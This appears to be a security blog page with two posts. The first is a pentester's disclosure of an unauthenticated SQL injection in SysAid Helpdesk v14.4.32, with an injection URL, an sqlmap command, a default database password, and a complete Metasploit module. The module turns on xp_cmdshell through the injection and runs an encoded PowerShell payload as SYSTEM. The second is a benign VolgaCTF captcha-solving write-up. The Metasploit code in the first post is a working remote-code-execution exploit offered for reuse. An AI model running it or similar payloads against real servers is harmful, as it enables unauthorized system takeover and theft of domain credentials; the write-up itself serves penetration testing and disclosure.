Tuesday, September 29, 2015

Unauthenticated SQL Injection in Sysaid Helpdesk Free v.14.4.32. b25

Discovered: June 2015

This is a flaw that I came across at a pentest for a client, the flaw ended up giving us enterprise admin access which isn’t too bad.

This issue is fixed in later versions and it seems that Sysaid have become aware of the issue on their own. This writeup is mostly for my own reference and everybody out there doing penetration testing encountering old versions of the software inside company networks.

The product

https://www.sysaid.com/

This is helpdesk software made ofr for managing company support cases, providing remote support, and a bunch of other stuff. This software’s database can contain domain credentials that are encrypted using a hardcoded secret as mentioned in the referenced CVEs. This makes it a high-value target that can give access to a large number of credentials and highly privileged accounts. The vulnerability will give facilitate remote code execution on the server as the SYSTEM user if the default configuration is in use.

The vulnerability

Sysaid is vulnerable to SQL injection at the following url:

http://sysaidserver:8080/api/v1/menu/menu_items?menu=main'WAITFOR+DELAY'0%3a0%3a10'--&all_tree=true

This makes it possible to dump the entire database using for instance SQLMap. To exploit the vulnerability successfully, SQLMap must be provided with a valid JSESSIONID cookie that will be set by the server upon first visit to the site.

The following SQLMap command will detect and be able to exploit the injection vulnerability to return the user that the database commands are executed as:

sqlmap -u http://sysaidserver:8080/api/v1/menu/menu_items?menu=main*&all_tree=true --cookie="JSESSIONID=xxx" --current-user 

The database is by default running as SA and can therefore activate xp_cmdshell to run operating system commands with the privileges of the user the database is running as. By default this user is the SYSTEM user on Windows.

Also the default “SA” user’s password is “Password1” which can be found in cleartext in the configuration files (CVE-2015-3001)

Previous Vulnerabilities in Sysaid Software

  • SysAid Server Arbitrary File Disclosure (2014-12-23)
  • Ilient SysAid 8.5.5 Multiple Cross Site Scripting and HTML Injection Vulnerabilities (2012-03-08)
  • Authenticated Blind SQL injection (2012-11-30)
  • CVE-2015-2993, CVE-2015-2994, CVE-2015-2995, CVE-2015-2996, CVE-2015-2997, CVE-2015-2998,CVE-2015-2999,CVE-2015-3000,CVE-2015-3001, CVE-2014-9436, CVE-2008-2179, CVE-2007-5259

Metasploit module

I wrote my first “real” Metasploit module to have a simple way to exploit this. As I have little to no experience with writing Metasploit modules and I’m not fluent in Ruby, it is a bit of a hack. But it should work and I hope someone can make use of it, I know I will the next time I encounter one of these installations..

Exploit

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'msf/core/exploit/powershell'
require 'msf/core/exploit/mssql_commands'


class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Powershell
  include Msf::Exploit::Remote::HttpClient



  def initialize(info={})
    super(update_info(info,
      'Name'           => "Sysaid Helpdesk Software Unauthenticated SQLi",
      'Description'    => %q{
        This module exploits an unauthenticated SQLi vulnerability in the Sysaid 
        Helpdesk Free software. Because the "menu" parameter is not handled correctly,
        a malicious user can manipulate the SQL query, and allows
        arbitrary code execution under the context of 'SYSTEM' because the database
        runs as the SA user. This module uses a Metasploit generated Powershell payload and 
    uses xp_cmdshell, which is activated and then deactivated after exploitation.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Hland', 
        ],
      'References'     =>
        [
          ['CVE', 'xxxx'],
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00"
        },
      'DefaultOptions'  =>
        {
          'InitialAutoRunScript' => 'migrate -f'
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['Sysaid Helpdesk <= v14.4.32 b25', {}]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Aug 29 2015",
      'DefaultTarget'  => 0,

))

      register_options(
        [
          OptPort.new('RPORT',     [true, "The web application's port", 8080]),
          OptString.new('TARGETURI', [true, 'The base path to to the web application', '/'])
        ], self.class)
  end

  def check

    peer = "#{rhost}:#{rport}"
    uri = target_uri.path
    uri = normalize_uri(uri,"Login.jsp")

    print_status("#{peer} - Checking for vulnerability")

    res = send_request_cgi({
      'method'    => 'GET',
      'uri'       => uri,
      'vars_get' => {
      }
    })

    v = res.body.scan(/\<title\>SysAid Help Desk Software\<\/title\>/)
    if not v
        vprint_error("Is this even a Sysaid Help Desk?")
        return Exploit::CheckCode::Safe
    else
        vprint_status("Identified system as Sysaid Help Desk")
    return Exploit::CheckCode::Appears

    end

    return Exploit::CheckCode::Unknown

  end

  def mssql_xpcmdshell(cmd,doprint=false,opts={})
    force_enable = false
    begin
      res = mssql_query("EXEC master..xp_cmdshell '#{cmd}'", doprint)
      #mssql_print_reply(res) if doprint

      return res

    rescue RuntimeError => e
      if(e.to_s =~ /xp_cmdshell disabled/)
        force_enable = true
        retry
      end
      raise e
    end
  end

  def exploit
    peer = "#{rhost}:#{rport}"
    uri = target_uri.path

    vprint_line("#{peer} - Getting a session token...")

    res = send_request_cgi({
      'method'    => 'GET',
      'uri'       => normalize_uri(uri, "Login.jsp"),
      'vars_get' => {
      }
    })

    vprint_line("#{peer} - Cookie's in the jar...")

    # Got a cookie, now ready to make exploiting requests
    if res && res.code == 200
        #vprint_line("#{res.headers}")
        cookies = res.get_cookies
        #vprint_line("#{cmd_psh_payload(payload.encoded, payload_instance.arch.first)}")
    else
        vprint_line("No 200 response? I'm outta here")
        return

    end

    # Put together the vulnerable URI
    uri = normalize_uri(uri,"api","v1","menu","menu_items")

    # Generate powershell payload as an encoded string
    powershell_payload = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {:encode_final_payload => true, :remove_comspec => true})



    #
    # Inject payload and wait for shell
    #
    print_status("#{peer} - Trying to activate xp_cmdshell and exploit vulnerability")

    sqli = "main';exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;EXEC master..xp_cmdshell '#{powershell_payload}';--"
    res = send_request_cgi({
      'method'    => 'GET',
      'uri'       => uri,
      'cookie'    => cookies,
      'vars_get' => {
        'menu' => sqli,
      }
    })


    # Deactivate XPCmdShell
    sqli = "main';exec sp_configure 'xp_cmdshell', 0 ;RECONFIGURE;exec sp_configure 'show advanced options', 0 ;RECONFIGURE;--"
    print_status("#{peer} - Deactivating xp_cmdshell to clean up after ourselves..")

    res = send_request_cgi({
      'method'    => 'GET',
      'uri'       => uri,
      'cookie'    => cookies,
      'vars_get' => {
        'menu' => sqli,
      }
    })

  end
end

Solving the YACST challenge at VolgaCTF 2015

In this post I will walk you through my solution to the Yet Again Captcha Solver Task. I found the task quite enjoyable to solve as I haven’t been working too much with sound files in this way.

So the name of the problem indicates that you have to solve a captcha of some sort. The task statement contains a link to a simple website with one link that downloads a .wav sound file and an input field in which to enter the solved captcha. Simple enough. You do have to solve the captcha 5 times in a row though. And when you try to do this manually, it only says too sloooow. So we need to automate the process.

Captcha we need to solve

So the .wav file contains a text-to-speech bot that reads a series of six numbers (0-9) with some interval of silence in between each number. The file is randomly generated each time we click the link. So we have to find a way to translate the sound for each number into a number that a program can submit to the website. So how do we do this?

I started out by writing a simple bash script that downloads a few .wav files and stores them to disk.

for i in `seq 1 5`;
do
    wget http://yacst.2015.volgactf.ru/captcha -O "captcha$i";
done

After looking at the .wav files, actually the file format is Resource Interchangeable File Format (RIFF), I decided that a possible way or step in solving the problem was to break the file down to a multiple parts, each containing a one of the numbers. I had no experience with working with .wav files so this took some Googling to figure out, but I found the sox program for Linux which seems to be a very common way to work with sound files from the command line. This program is comprehensive and the manual is long and a bit complex at first sight so I looked for examples of my problem online. I ended up with a command like this:

sox "captcha$i" "captcha$i.wav" silence 1 0.10 0.1% 1 0.15 0.1% : newfile : restart

This command takes a file called e.g. captcha1and splits the file where it finds a period of silence. The 0.10 and 0.1% values are the duration and threshold of silence respectively. I had to tweak these values a little to get good results as the files sometimes were split so that two numbers got included in a split file instead of a single number. These values gave good results for this challenge.

So now we have the ability to split files so that each part contains a single number from 0-9. That’s great, but we still need to convert from a sound file to a integer. The way I solved this is by simply looking at the size of the split files that were produced. I ran the download and split routine several times and looked several split files with the exact same file size. This showed that files with the same size tended to have the number contained. A nice thing to know here is that soxcomes with a play command that can be used to play a .wav file (and many other formats) from the command line. This made this process easier.

So now we know that a file containing for instance the voice recording of the number 0 tend to have a size of 5152 bytes. Which means we can write a program that translates between size and number. I was unsure if this was gonna be precise enough because I noticed some numbers didn’t always have the same filesize. But, we only need 5 in a row once, so it should be good enough. Since Python is my go to scripting language when I have to do more than throw together Linux commands so that’s what I went with. The first part of the code is just a dictionary translating between filesize and integer. The full code can be found here

    t = {
    '5152': 0,
    '4228': 1,
    '3988': 2,
    '3650': 3,
    '4730': 4,
    '5950': 5,
    '3998': 6,
    '3748': 7,
    '3334': 8,
    '4476': 9,

# Extra data
    '4832': 5,
    '3236': 8,
    '4474': 9,
    '3996': 6,
    '3498': 4,
    '4036': 6,
    '4614': 7,
    '5602': 9,
    '3320': 8,
}

The rest of the Python code is made to be called from the Bash script with a folder path and the captcha number to solve (e.g.1 for captcha #1). The code translates the captcha and submits it using a POST request to the endpoint found on the simple challenge website. The website uses a JSESSIONID cookie to track the user submitting the captchas, so it is important that we use wgets flags to store the initial cookie that we get, the first time we download a .wav file, and continue using the same cookie when posting the solved captchas. Use the following flags for the first download:

wget –keep-session-cookies –save-cookies cookies.txt http://yacst.2015.volgactf.ru -O captcha1

And the load the cookies for the next download using:

wget --load-cookies cookies.txt http://yacst.2015.volgactf.ru/captcha -O "captcha2";

and so on. So this is how I solved the challenge for 200 points at the VolgaCTF. This task was beginner / intermediate difficulty at this CTF as the highest scored task was 600 points.